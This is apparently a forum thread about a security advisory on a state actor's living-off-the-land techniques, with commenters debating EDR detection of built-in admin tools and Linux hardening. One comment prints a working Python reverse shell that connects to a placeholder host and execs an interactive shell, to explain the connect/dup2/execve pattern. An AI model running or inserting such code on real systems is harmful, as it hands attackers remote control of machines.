On Linux servers I always uninstall the compiler and dev tools. I actually wrote a little script to dry-run uninstall every single package on the server one by one, and if uninstalling it doesn't remove anything important I'll go ahead and uninstall it.
I'm left with only a bare minimum of stuff; I'll uninstall even things like man pages or simple utils.
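For anyone curious, the approach is roughly the sketch below (Python, assuming a Debian/Ubuntu box with apt; the KEEP list and the "nothing important" check are placeholder heuristics, and it only prints candidates rather than removing anything):

```python
#!/usr/bin/env python3
"""Dry-run "can I remove this?" sweep, in the spirit of the comment above.
Assumes a Debian/Ubuntu host with apt; the names in KEEP are illustrative."""
import subprocess

# Packages (or name prefixes) that must never be pulled out by a removal.
KEEP = ("openssh-server", "systemd", "libc6")

def installed_packages():
    """List installed package names via dpkg-query (first column of -W output)."""
    out = subprocess.run(["dpkg-query", "-W"], capture_output=True, text=True, check=True)
    return [line.split()[0] for line in out.stdout.splitlines() if line.strip()]

def simulated_removals(pkg):
    """Packages apt *would* remove for `apt-get remove <pkg>` (-s = simulate only)."""
    out = subprocess.run(["apt-get", "-s", "remove", pkg], capture_output=True, text=True)
    # Simulated removals show up as lines beginning with "Remv".
    return [line.split()[1] for line in out.stdout.splitlines() if line.startswith("Remv")]

for pkg in installed_packages():
    removed = simulated_removals(pkg)
    if removed and not any(r.startswith(KEEP) for r in removed):
        others = ", ".join(r for r in removed if r != pkg)
        print(f"candidate: {pkg}" + (f" (would also remove: {others})" if others else ""))
```

Since `apt-get -s` only simulates, the loop is safe to run as-is; you still review the candidate list by hand before actually removing anything.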
If you're in a position to upload and compile source, you could just upload a binary instead. Unless it's a very specific system, you can probably put it together "at home" and slap it in there.
From the summary, paragraph 3:

>One of the actor’s primary tactics, techniques, and procedures (TTPs) is living off the land, which uses built-in network administration tools to perform their objectives. This TTP allows the actor to evade detection by blending in with normal Windows system and network activities, avoid endpoint detection and response (EDR) products that would alert on the introduction of third-party applications to the host, and limit the amount of activity that is captured in default logging configurations. Some of the built-in tools this actor uses are: wmic, ntdsutil, netsh, and PowerShell.
Oh wow, so living off the land is the same as "hands-on-keyboard" activity now? They used Impacket, ffs! This is a very typical post-compromise playbook many actors use. A lot of this might even be considered bad opsec.
This is why it is said that APTs are usually not very sophisticated; they just have a lot of resources.
Are LOLBINs still an issue for most companies? I was under the impression that most endpoint detection products simply trace all syscalls, and therefore can somewhat accurately extract information about exploitation events without relying on a "foreign" file artifact.
LOLBINs are very much an issue at pretty much every company there is. Just because there's a way to detect them doesn't mean they're actually detected, or that an alert is raised, or that the alert is triaged correctly, or that EDR is even turned on, etc.
It's a needle-in-a-haystack issue. Plus, most EDR products do not actually alert on benign-looking syscalls, as that would quickly cause a false-positive overload.
I would be very surprised if EDR products didn't use some form of anomaly detection (e.g. autoencoders [1], ANN embeddings, etc.).
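To illustrate the idea (not any particular vendor's implementation): a reconstruction-error autoencoder in PyTorch, trained only on "normal" telemetry, where anything that reconstructs badly gets flagged. The feature vector here (say, normalized per-process syscall frequency counts) is an assumption made purely for the example.

```python
# Toy reconstruction-error anomaly detector (PyTorch). Nothing here reflects any
# vendor's actual pipeline; the feature vector is an assumed per-process summary.
import torch
import torch.nn as nn

class SyscallAutoencoder(nn.Module):
    def __init__(self, n_features: int, bottleneck: int = 8):
        super().__init__()
        self.encoder = nn.Sequential(nn.Linear(n_features, 64), nn.ReLU(),
                                     nn.Linear(64, bottleneck))
        self.decoder = nn.Sequential(nn.Linear(bottleneck, 64), nn.ReLU(),
                                     nn.Linear(64, n_features))

    def forward(self, x):
        return self.decoder(self.encoder(x))

def train(model, normal_batches, epochs=10, lr=1e-3):
    """Fit only on 'normal' activity; anomalies are whatever reconstructs poorly."""
    opt = torch.optim.Adam(model.parameters(), lr=lr)
    loss_fn = nn.MSELoss()
    for _ in range(epochs):
        for batch in normal_batches:
            opt.zero_grad()
            loss = loss_fn(model(batch), batch)
            loss.backward()
            opt.step()

def anomaly_score(model, x):
    """Per-sample reconstruction error; alert above some tuned threshold."""
    with torch.no_grad():
        return ((model(x) - x) ** 2).mean(dim=-1)
```

The modelling part is the easy bit; as the replies note, the hard part is picking a threshold that doesn't bury analysts in false positives.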
I've gotten into trouble with employers over editing system configuration files and trying to start reverse shells, and I can't imagine execve() or connect()+dup2() are malicious either.
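For anyone who hasn't seen it, connect()+dup2()+execve() is just the textbook reverse-shell pattern; a minimal Python sketch, with placeholder host/port, for use only on machines you own:

```python
# Textbook reverse shell: connect a TCP socket, dup2() it over stdin/stdout/stderr,
# then exec a shell. HOST/PORT are placeholders (TEST-NET address).
import os
import socket

HOST, PORT = "192.0.2.10", 4444

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))                  # connect()
for fd in (0, 1, 2):
    os.dup2(s.fileno(), fd)              # dup2() over stdin/stdout/stderr
os.execv("/bin/sh", ["/bin/sh", "-i"])   # ends in an execve(2) of the shell
```

Every call in there is something legitimate software does constantly, which is exactly why a syscall-level signature alone doesn't cut it.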
Some are working on it (SentinelOne is a notable player with the capacity), but ML domain experience in the Cybersecurity space is severely lacking as a lot of Cybersecurity PMs and Founders are ex-Networking types who view ML/AI as marketing hype.
Source: am a PM in the space who has been banging heads with these types of people
They might, and some definitely do, but at a large enough scale maintaining a good anomaly-detection signal-to-noise ratio becomes very difficult.
A single Ubuntu terminal spawn will generate something like 20 system calls. Now multiply that by however many actions you take during 8 hours of using a computer, across a generic corp with over 10k hosts.
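Back-of-envelope, with every number made up purely for illustration:

```python
# All numbers here are illustrative guesses, just to show the scale of the problem.
syscalls_per_action = 20          # e.g. one terminal/shell spawn
actions_per_host_per_hour = 500
hours_per_day = 8
hosts = 10_000

events_per_day = syscalls_per_action * actions_per_host_per_hour * hours_per_day * hosts
print(f"{events_per_day:,}")      # 800,000,000 syscall events per day
```

Even a 0.01% false-positive rate on a stream like that is ~80,000 alerts a day, which no SOC is going to triage.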
Depends. The TS/SCI enclave at Raytheon R&D is probably locked down. However, most of the (sub)contracting work is done by small-to-medium-business America, and they've never even heard of LOLBINs.
This is not about CCP spies setting up a tent in the wilderness and using public wifi to launch hacks, this is about "living off the land" meaning using existing system admin tools to hack systems. Although the other explanation would be more cyberpunk.
I believe even an expert security researcher would have a hard time using Windows as a personal machine without getting hacked. There are so many attack vectors, and the security updates and guidance from Microsoft are completely lacking.
Most serious security researchers use an airgapped laptop with the wireless card pulled or otherwise disabled. There are far fewer ways to compromise a laptop whose only comms are a USB stick physically transported between two computers, though it's not necessarily impossible.
There are mentions of Linux right at the beginning:
>The actor has leveraged compromised small office/home office (SOHO) network devices as intermediate infrastructure to obscure their activity by having much of the command and control (C2) traffic emanate from local ISPs in the geographic area of the victim.
If you're just running a random Linux server that isn't an otherwise "interesting" target, the only times I've seen one get compromised were through some ludicrously dumb configuration mistake, such as running a database with a default admin password and no firewall, etc.
It's a less interesting target for a lot of widespread attacks. Consider the attack surface of Linux machines vs. Windows: most big corporations run on Windows, and even if devs rock Linux, that's not usually what these types of attacks are after.
That said, you are right. Most Linux users ride on insecure machines. I remember talking to someone who had no idea they had to set up a firewall. They had switched to Linux 2 years prior on the premise that it was more secure than Windows out of the box. I wish Linux security was talked about more. The people who know how to do it assume everyone does, and the people who don't... don't know what they don't know.